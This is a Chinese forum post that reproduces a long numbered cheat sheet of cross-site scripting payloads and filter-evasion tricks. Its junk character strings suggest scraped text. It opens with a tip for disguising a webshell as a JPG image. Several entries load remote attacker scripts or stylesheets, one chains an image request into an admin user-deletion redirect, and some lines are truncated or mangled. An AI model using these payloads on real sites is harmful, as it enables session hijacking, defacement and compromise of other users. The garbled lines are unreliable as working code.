跨站图片shell3 Q0 l e3 b3 I
XSS跨站代码 <script>alert("")</script>
: _0 x8 ?% E) o1 n( `% c9 \; _* r$ g$ { g+ x
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马1 V3 l5 R* E) J# X( K8 g9 C+ S
" p# m) C7 x& p$ w5 N$ C3 G
% R, d6 j2 R8 J9 E0 Q! b( V% U
1)普通的XSS JavaScript注入+ x* t/ l% D7 o# d& u7 D$ ?
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) D1 ]: [" J' D; v+ P+ z5 T' A9 Q
7 H$ \ _$ q/ g' ~0 g
(2)IMG标签XSS使用JavaScript命令; A9 w' r3 h) f: X% X0 Z
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* g2 F) L# T3 R) d* t. Z/ ^4 \
8 [ m6 {: v) T+ M9 p(3)IMG标签无分号无引号" P( l- b( J$ S- }
<IMG SRC=javascript:alert(‘XSS’)>& c" |+ ^1 N, d: E: [* k% k
1 j2 x1 {- h5 q& Y$ w1 |) g(4)IMG标签大小写不敏感
$ ?, B6 J9 c/ _% P<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
/ U7 _4 @) \. ~ Y# o( z' T& x: X# K1 }( \( n4 o
(5)HTML编码(必须有分号); ~9 x; O/ t" S J( E3 |# J
<IMG SRC=javascript:alert(“XSS”)>
% u) d* n3 `8 F0 Y+ [0 n0 u" D
; K- D0 t; o* G' ^) o- e1 e(6)修正缺陷IMG标签& ?' Y! w, _# b! d( Z
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>' E( s, n/ H$ v ?9 A
+ S, T* a, t, q(7)formCharCode标签(计算器)
1 _9 v2 h" v* y' T" {<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> z; T6 }$ h6 `5 u$ B
/ h1 `4 u- [5 A+ g% G
(8)UTF-8的Unicode编码(计算器)6 ^. a+ B/ H. g4 N
<IMG SRC=jav..省略..S')>
' n3 W; L# z3 d* ]
7 C) B: p( w0 a/ d9 b(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
6 ^5 c! ]8 v0 D5 w* p% w<IMG SRC=jav..省略..S')>0 ?% F( B% I7 s& K7 i; i4 Y- w
5 O3 e% O9 j$ E n+ ]
(10)十六进制编码也是没有分号(计算器)
{% a3 ~: s% V: @<IMG SRC=java..省略..XSS')>5 t* e3 B7 @! {2 j: N
3 x7 u1 y# B B% M
(11)嵌入式标签,将Javascript分开) Y5 n9 P' O9 `6 I2 n
<IMG SRC=”jav ascript:alert(‘XSS’);”>: W7 W+ n# T5 P8 B! u$ q
; _- U3 r, r# D) Q3 Y2 L& H(12)嵌入式编码标签,将Javascript分开' f1 p' S: Y$ u
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 `5 G# x0 w- ^9 \2 P# i4 m3 E
- K- K5 @- T# r% J(13)嵌入式换行符
- W* J( ^5 K, w0 C3 e" j1 L<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 p0 }0 r d* x1 U6 m4 [# M3 L
7 U0 ?& l( ] g0 b(14)嵌入式回车# s' P6 h& e0 n
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 N. G' s3 F6 R( q6 t
8 x5 N* S0 b) g+ a# a% |% _, _
(15)嵌入式多行注入JavaScript,这是XSS极端的例子$ x, U9 r. _5 \7 V# f
<IMG SRC=”javascript:alert(‘XSS‘)”>$ ~ E1 T3 E8 k3 y% \- d3 r) y
6 w- I( ]7 W7 j4 l2 e(16)解决限制字符(要求同页面)
8 }- T0 `. x: `- n! c" O$ C T3 G<script>z=’document.’</script>
. X2 ^$ B6 v* ~0 S<script>z=z+’write(“‘</script>+ g. N. A% w) @( h ^. M
<script>z=z+’<script’</script>
# s3 ?) x6 z' C$ \<script>z=z+’ src=ht’</script>+ C, f: M \4 J- j U& m
<script>z=z+’tp://ww’</script>
' u, r* j$ y; }$ ~/ J<script>z=z+’w.shell’</script>+ a o4 r2 [& [3 m: q& Z
<script>z=z+’.net/1.’</script># W# O8 }+ k1 l+ N: h! x# c( s6 R
<script>z=z+’js></sc’</script>
" \; A2 y2 K+ r5 s: I# e0 X/ y2 q<script>z=z+’ript>”)’</script>% f7 y9 ~% ~- d. d
<script>eval_r(z)</script>3 m8 d3 _4 x2 L' q, v
# X" w0 ~9 _! L- q4 n7 _: q
(17)空字符( _8 k. N3 e, P+ Q0 O* H
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 e* o" P+ d t3 ^# l: L4 K: D4 B
4 P/ C5 g) Y0 t(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* v2 S- I8 B6 u! f- m2 p5 Fperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
# N8 K! B, _/ P3 p; I6 j' ^
2 E- f3 u e+ G' W(19)Spaces和meta前的IMG标签
9 Y& t4 A T/ l3 S) v+ n( q<IMG SRC=” javascript:alert(‘XSS’);”>) [4 Q, k, N2 _1 B, d% j4 f
n; P: h# S/ B
(20)Non-alpha-non-digit XSS
# i# b! |0 e$ }$ X* c<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* l9 K. {0 M$ L) R* d( d! {! R0 @/ m! t, h3 T
(21)Non-alpha-non-digit XSS to 2
' U# q$ a/ }2 V7 n* o) H! K<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% M1 F9 `0 m6 ]% j# ~* M
0 @- A1 s: z, f" v
(22)Non-alpha-non-digit XSS to 3
$ `# Y2 T* Q R0 c<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
9 O9 ~: U, u9 N4 y5 `( V& N, Y. i! o6 ? ]
(23)双开括号# X8 f1 k: M9 K; K( [
<<SCRIPT>alert(“XSS”);//<</SCRIPT>" q- l0 \% m7 z, E# ]
; R5 c# A: v0 k5 T3 H+ p( b6 ~(24)无结束脚本标记(仅火狐等浏览器)
, B; r3 Z3 Y7 ]& A I, K: J<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) I: @+ N7 m8 @1 `/ W; Q4 K3 m3 E
(25)无结束脚本标记2
* B5 ^6 Q5 P2 r$ O. j! y<SCRIPT SRC=//3w.org/XSS/xss.js>
3 a4 q& Z' D* n4 J5 P/ A( b* d' d, I2 F7 J
(26)半开的HTML/JavaScript XSS
+ [! z2 i. R; L/ @7 P<IMG SRC=”javascript:alert(‘XSS’)”
" @0 R& Q r9 L4 s! ?* L9 `9 |* g3 b# i: x7 a" q4 A: Y% Y, h. B _# h
(27)双开角括号+ B! {- v1 l" }9 v* Z; S0 |! G
<iframe src=http://3w.org/XSS.html <3 c! l! i& Z3 q2 j
. X" [: Y3 g+ s0 k; v7 b/ M(28)无单引号 双引号 分号
( a8 i" c; A$ C' n6 p: c" p; U<SCRIPT>a=/XSS/
, Q( D. Q. ~ r% [# I# malert(a.source)</SCRIPT>. Z3 r* |/ f) G, e
3 R' Z" C+ P: |) _(29)换码过滤的JavaScript
# N" a& L& j1 |; Y8 J\”;alert(‘XSS’);//5 S3 {% W+ e' g; T+ f
7 B8 x5 Z. U; a7 J* n(30)结束Title标签
9 b! K, d4 s% u* `</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>! O# N8 s( ~# X7 O8 R7 _9 _ F1 g. Z
1 F( a- C) l* |
(31)Input Image
/ h+ H% l6 v3 S<INPUT SRC=”javascript:alert(‘XSS’);”>
- u% N, d. E* x! m v8 `. @" S6 `# N0 ]
(32)BODY Image3 n2 p1 o0 x( w: _; }9 Y' u
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>+ v5 o- M/ O' a$ N& {
/ W/ \* Y' G0 V' h1 s0 V
(33)BODY标签
4 A Z: e+ Z" c [4 z9 _ u/ F/ g<BODY(‘XSS’)>& c8 h% X' i y& w
* f% ^. Y. u; L: ?2 o, W$ R(34)IMG Dynsrc
; ]6 k1 |' Y# J. H" X8 C+ z<IMG DYNSRC=”javascript:alert(‘XSS’)”>, C7 M' a2 [: w/ W
; L1 ~6 P9 m' N5 Z; S* p(35)IMG Lowsrc
! @& _7 p( B0 d! b) g! l7 |<IMG LOWSRC=”javascript:alert(‘XSS’)”>$ Y( N$ ~$ A& a! K
: Z$ {+ i6 a7 q4 W" F
(36)BGSOUND# R8 ]+ ]$ O* Z" o; C
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
* o0 j# _+ P7 t4 A _- a G, ~1 n& f1 T/ f O
(37)STYLE sheet0 |% H: v( ]) m5 l( a
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) }5 v5 z; _( a6 b8 p3 }$ e
: F- W# |6 Z! n/ U8 A1 L u: u, T
(38)远程样式表
( f, @# W3 \: Z/ u<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
y% i- Z I" h8 p4 o, W. a4 t$ f* |
(39)List-style-image(列表式)
' o* s5 e- K/ O<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ _- b( b* {/ I$ c s
u# l" m6 h; E2 Q5 E
(40)IMG VBscript9 J( K6 d% ~3 C! z; H
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
5 h; R9 h) E+ x, S' R& y
7 j+ a9 m& o* ?(41)META链接url$ P! x& N! [& b: w5 z C
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
# V1 K; y) n, d8 T: C: M c& h0 C# a) s: A; _/ \# X2 p2 h0 `
(42)Iframe) [: K$ Y) @. _7 j! i( K9 f+ G' B
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 q! e& t. a7 y- I, C. W- n(43)Frame9 d; o' H' T: L" h; t4 E
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>" ^# G2 M4 B6 s, Y8 R
. O2 ?1 I# _3 Z+ A9 E(44)Table
e. [8 O, a! c- S. z+ g+ ?: `( V<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) S1 l- _- R+ ]8 |, _
$ _& `- h/ R2 d(45)TD
4 X8 t3 S- L% s/ ?/ W<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>; ]# Y, V" B( I8 P- m
5 O. a* K6 @0 Z' `
(46)DIV background-image" c/ [& i$ E# S
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( k& b0 W( ?+ F. a" D
' s4 P$ H9 n9 E3 a; n& w2 z(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)2 _) w8 x7 @ x
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
' v: l3 N u/ \1 Z3 m, g- f1 K& d4 V3 W+ [* Y* D
(48)DIV expression
1 M3 C6 p6 r+ h% O5 _& O! w<DIV STYLE=”width: expression_r(alert(‘XSS’));”>0 \9 ?9 N* `9 W8 c: t4 V9 b! R
* B9 o$ k" H5 ?9 P" I) d(49)STYLE属性分拆表达
( S5 Z. s& i2 ?9 e! e<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; [7 A3 Q0 p2 \+ W+ E t0 i- O' o! ]# w: R
(50)匿名STYLE(组成:开角号和一个字母开头)3 U) j8 o5 b& ~ [
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>$ d t- _0 u/ e1 K7 k! w2 ^( w7 h
4 S8 `) N9 \" l( G, _8 P(51)STYLE background-image
8 d9 ^. z+ W3 F! y- `<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>4 x1 Z* F. M& q* Y8 \- K+ h
1 W/ f6 c; K4 j% b2 I- }(52)IMG STYLE方式/ L+ }' U/ F) W- `' {9 B0 W
exppression(alert(“XSS”))’>
_. W. ^# `4 f0 b; w* T1 n; g' P1 d+ g3 j
(53)STYLE background
- s: k, C8 Y4 G<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
* J6 K6 F' }: R3 i& x$ q7 `2 H# ~( P7 j9 F2 @) ?
(54)BASE
* {& C9 Z! s+ P( I* `- r. J3 j<BASE HREF=”javascript:alert(‘XSS’);//”>
6 M$ K* u n/ Y8 j) B7 e% K$ |" c
" ~: ?& T" A& C" h- F, x& H; w& ](55)EMBED标签,你可以嵌入FLASH,其中包涵XSS+ |4 h# ~1 p+ p% G0 ?
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>4 n' b9 X% k6 Y' c4 ]3 B! Z
, T2 c4 a) d1 F3 K) w4 W
(56)在flash中使用ActionScrpt可以混进你XSS的代码
- b5 [% V8 i2 h9 Q; C5 ^# y+ j4 E( Aa=”get”;1 l G8 n) A2 S( R/ n9 N
b=”URL(\”";
5 c% x$ L7 A) W5 B& e0 C8 ?c=”javascript:”;
' Q" {4 p, g% Pd=”alert(‘XSS’);\”)”;# F& Q z& X& ?) b0 P I" r
eval_r(a+b+c+d);# G7 ]+ {8 u4 }0 O8 T6 E1 \
8 d4 [+ _" R5 Z$ Q' ~! b" n(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上9 t! |$ y$ b* ]7 D K
<HTML xmlns:xss>
4 |1 _' Q5 m% h<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>. {! g1 z* D2 Z0 m( r1 r
<xss:xss>XSS</xss:xss>
/ \3 i7 s! J6 a</HTML>* \4 U; @8 M* W/ f2 ?
5 Q3 y/ y5 s4 X# h(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; u" r5 t m; b. Z<SCRIPT SRC=””></SCRIPT>
4 M" R" t, G: h# C( P" w6 c7 p$ j3 X+ e- c) D" h7 r. j
(59)IMG嵌入式命令,可执行任意命令
4 `! d4 V3 B) O" }8 M<IMG SRC=”http://www.XXX.com/a.php?a=b”>5 K+ e' \8 K$ W* l9 R! R& D; d. f
* a! \+ g3 L# `; O% e2 v
(60)IMG嵌入式命令(a.jpg在同服务器)( C' }& R5 Q# D& z
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. M9 }0 N9 @: n
$ Q- n$ o( g. i$ J) e; ?. W
(61)绕符号过滤
# C4 v) {7 o% ~% U1 Y<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 _2 r7 Z9 y1 A, c7 A. I, @
9 U; f( v. ^6 K2 y6 z) h) f& R(62)/ y8 X! v- L3 Z/ o1 I/ S8 {
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>" ? b* U; i7 c1 u0 @# ~
" Q% D, e1 y7 _1 {6 |" ^
(63)
c J' A m# H' @<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! t V- H1 d4 J% I' a6 H" `
9 S( B7 `* B9 I6 N' w' s5 h F(64)
8 j! H7 X4 E7 D<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>5 Y9 v: [* m i. H8 S
/ A3 S. o' j" U5 O# m7 r
(65)
3 z! W5 [8 y5 ~! r8 |0 }<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
3 I7 r, K) F, q9 K) g& W; j
; R, h) x6 g+ Z) R& D7 o8 Y# g7 m+ x(66)% r9 M3 H# R6 t. G! R
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>; T6 d! G2 z: i) k4 e
* ?: r- g) V: M- z/ r" t! P(67)+ j. W5 V7 h+ b! y0 o+ v
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>1 \6 Z& W: I7 J3 P2 g
$ Z5 v* z# m0 r3 D$ E! ~% g8 K(68)URL绕行1 I2 W& a7 {8 d/ J
<A HREF=”http://127.0.0.1/”>XSS</A>
* ^/ [8 x1 G# l: o4 v0 G% p! o: C8 c9 s
(69)URL编码, @2 k% ]5 K3 m @' {% V3 L7 r
<A HREF=”http://3w.org”>XSS</A># J5 R( Z* X) d' f: P3 o$ ~
% @) l. t# c# P8 A2 Q6 O2 u) U
(70)IP十进制
: g4 o, s" m4 q9 E1 H- l5 E<A HREF=”http://3232235521″>XSS</A>5 y" ^4 M& J- z i6 S
0 P8 B% h5 A3 w3 _(71)IP十六进制
$ m/ C& k; M' F6 S! B7 g) f3 }<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>, U2 Z& s N% D$ E1 h
9 m- y% [9 S0 K! t' V; f( P
(72)IP八进制
2 |9 j$ E6 v6 h3 f; h5 Z<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ b$ N& z0 C4 w5 \; U
6 Y) x; u9 y: ]% {1 ]
(73)混合编码5 n4 J: `8 R1 M; B5 j$ u8 y% q5 ]9 y
<A HREF=”h
7 e5 D% H3 w3 l; O) v! T7 L6 @tt p://6 6.000146.0×7.147/”">XSS</A>
5 m' i5 P8 y. e# {+ X! f: c" G; P4 a* t- p8 k0 I5 |- c: b
(74)节省[http:]
$ t- t0 E7 m, m<A HREF=”//www.google.com/”>XSS</A>9 x! x0 k6 M; s3 D0 K% Z
$ D1 |3 o* v" l/ O5 `, A(75)节省[www]
! e# p% \" z e* n' ^7 D0 T<A HREF=”http://google.com/”>XSS</A>
% s# ^9 X8 v* z6 @: ], J. ~) @5 s/ x" Z
(76)绝对点绝对DNS! ~9 J$ m8 L4 ?& Z8 [( {- k' a) D
<A HREF=”http://www.google.com./”>XSS</A>/ W) u' y& E6 g5 B) o" \
3 t4 Z0 M/ h& ?5 Z" C( l/ a
(77)javascript链接
3 h, a# ?8 i* u<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>5 F, ?' J' R/ N8 O8 P8 c
|
发表于 2012-9-13 17:04:56
收藏
支持
反对